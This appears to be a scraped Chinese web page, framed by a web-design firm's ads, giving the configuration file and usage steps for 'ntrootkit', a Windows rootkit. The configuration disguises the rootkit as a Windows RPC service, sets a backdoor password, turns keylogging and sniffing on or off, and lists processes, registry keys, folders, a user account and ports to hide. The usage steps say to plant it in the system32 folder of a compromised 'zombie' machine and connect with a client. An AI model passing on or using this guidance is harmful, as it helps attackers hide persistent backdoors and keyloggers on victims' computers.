NTrootkit

我们拥有10余年网页设计和网站建设经验，从网站策划到网站制作，我们的网页设计师为您提供的解决方案。为企业提供成都网站建设、网站制作、微信开发、小程序制作、移动网站建设、H5场景定制、等业务。无论您有什么样的网站设计或者设计方案要求，我们都将富于创造性的提供专业设计服务并满足您的需求。

一，配置方法

\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL]    //下面为配置内容
\\servicename is the ntrootkit 's servicename
servicename=tsserver      //服务名
servdispname=rpcsvr
servdescription=windows system rpc server
installdir=com\sserver     //安装目录
connpass=12345            //连接密码
appname=51cto.exe
keylog=0                      //0为不记录键盘
workmode=1                 //0为sniffer模式
[HIDDEN PROCNAME]     //要隐藏的服务名

51cto
[HIDDEN REGKEY]    //要隐藏的注册表键

zero\soft\...\...\xxx

[HIDDEN REGVALUE]  //要隐藏的注册表键值

zero\soft\...\...

[HIDDEN FILEDIR] //要隐藏的文件目录

c:\rootkit

[HIDDEN SERVICE] //要隐藏的服务名

servicert
[HIDDEN USER] //要隐藏的用户名

zerosecurity
[HIDDEN TCPPORT] //要隐藏的tcp端口
tcpport=5768

[HIDDEN UDPPORT] //要隐藏的udp端口
udpport=4000

二，使用方法

      ①：将配置文件 .ini和服务端ntrootkit.exe放入肉鸡的 system32目录下，然后运行ntrootkit.exe安装；ntrootkit -u password 可卸载；

        

      ②：客户端用rtclient连接；

        

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

标题名称：Rootkit之ntrootkit的配置使用-创新互联
文章出自：http://scyanting.com/article/dpdsgs.html